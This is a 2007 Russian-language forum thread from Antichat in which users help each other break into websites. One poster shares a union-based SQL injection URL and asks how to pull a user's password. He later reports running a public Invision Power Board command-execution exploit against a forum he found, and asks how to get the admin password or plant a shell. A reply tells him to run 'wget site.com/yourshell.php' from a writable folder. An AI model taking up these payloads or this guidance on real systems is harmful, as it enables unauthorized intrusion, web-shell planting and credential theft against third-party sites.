ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу помогите с Sql Inj
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

помогите с Sql Inj
  #1  
Старый 07.02.2007, 21:03
Aerot1smo
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264

Репутация: 26
По умолчанию помогите с Sql Inj
вот нашёл
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

как составить запрос чтобы получить пасс юзера?
прошу помогите
 
Ответить с цитированием

  #2  
Старый 07.02.2007, 21:07
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
универсального запроса нет если хочешь чтоб за тебя всё сделали то уж как минимум ссылку в студию. А если хочешь сам - то почитай в статьях про скуль инжи, клоновых тем вагон и тележка)
 
Ответить с цитированием

  #3  
Старый 07.02.2007, 21:09
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию
Цитата:
Сообщение от Aerot1smo  
вот нашёл
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

как составить запрос чтобы получить пасс юзера?
прошу помогите
Если линк не хочешь светить, то пиши мне в ПМ или в асю...
 
Ответить с цитированием

  #4  
Старый 07.02.2007, 22:26
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
Ну и мене напиши тож чтоль %)
 
Ответить с цитированием

  #5  
Старый 07.02.2007, 23:31
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
там префикс ищи исходник.
 
Ответить с цитированием

  #6  
Старый 08.02.2007, 22:09
Aerot1smo
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264

Репутация: 26
По умолчанию
решил новую тему не делать
всем привет опять,нашёл форум уязвимый IPB 2.1.5
заюзал сплойт Invision Power Board 2.* commands execution exploit by RST/GHC
вродебы всё ок,тока вот теперь появилась строка "Command for execute or 'exit' for exit #" чё там писать(напривем чтоб получить пасс админа или залить шелл)?
 
Ответить с цитированием

  #7  
Старый 08.02.2007, 22:58
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
ищешь папку, где у тебя прав хватает на запись и там:
wget site.com/yourshell.php
про комманды можно в гугле много интересного найти)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ